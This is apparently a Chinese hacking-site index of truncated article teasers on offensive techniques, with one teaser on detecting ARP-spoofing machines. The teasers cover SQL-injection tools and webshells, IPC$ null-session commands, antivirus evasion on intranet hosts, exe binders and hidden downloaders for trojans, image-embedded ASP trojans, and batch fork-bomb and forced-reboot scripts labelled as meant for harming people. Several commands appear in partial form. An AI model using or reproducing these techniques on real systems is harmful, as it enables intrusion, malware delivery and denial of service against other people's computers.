网络安全

说到SQL注入机，从娃娃针对动网文章的dvTxt.pl到臭要饭的绝世猜解CSC、NB联盟的NBSI，大家也都用过吧？ 开天始祖 dvTxt.pl，也不知被改了多少遍，以用于针对各种不同的有SQL注入漏洞的系统，通常《黑防》的一篇《**存在SQL注入漏洞...

有时候拿到一SHELL是SA权限。 但是内网。我们直接想到用LCX转发端口 那假如LCX被杀了之后你会怎么办呢 当然很多人就会想到用远控。。。 因为我没玩过远控和其他的病毒 所以就想到了以下的办法 第一导出注册表的启动项。修改里面杀毒的路径。在导入注册...

net use $">\\\\ip\\ipc$Content$nbsp;" " /user:" " 建立IPC空链接 net use $">\\\\ip\\ipc$Content$...

如何能够快速检测定位出局域网中的ARP病毒电脑？ 面对着局域网中成百台电脑，一个一个地检测显然不是好办法。其实我们只要利用ARP病毒的基本原理：发送伪造的ARP欺骗广播，中毒电脑自身伪装成网关的特性，就可以快速锁定中毒电脑。可以设想用程序来实现以下功能...

一、传统的捆绑器 　　这种原理很简单，也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候，B.exe也跟着执行了。这种捆绑器的代码是满网都是。我最早是从jingtao的一篇关于流的文章中得知的。就目前来说，已经...

一．通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。 分析: N.E.V.E...

第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:\\1.txt echo. >c:\\1.txt &...

大家在是否碰到过这样的站点： 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担，提高访问速度。二来也阻止了SQL注入式的攻击。。 我来说说他们的文章系统原理：全部文章均在数据库存有一个副本。另处根据模板生成一个HT...

1.名称：如何制作图片ASP木马 （可显示图片） 建一个asp文件，内容为<!–＃i nclude file="ating.jpg"–> 找一个正常图片ating.jpg，插入一句话木马（比如冰狐...

具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。 具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告...

一、看见漏洞公告 　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php 　　in...

大家可能都用过网页木马来下真正的EXE木马吧，但是有些时候 后门比较大下载的时候常常是网页暂停或是报错（CHM木马常遇到） 所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数: C:\\masm32\\BIN>...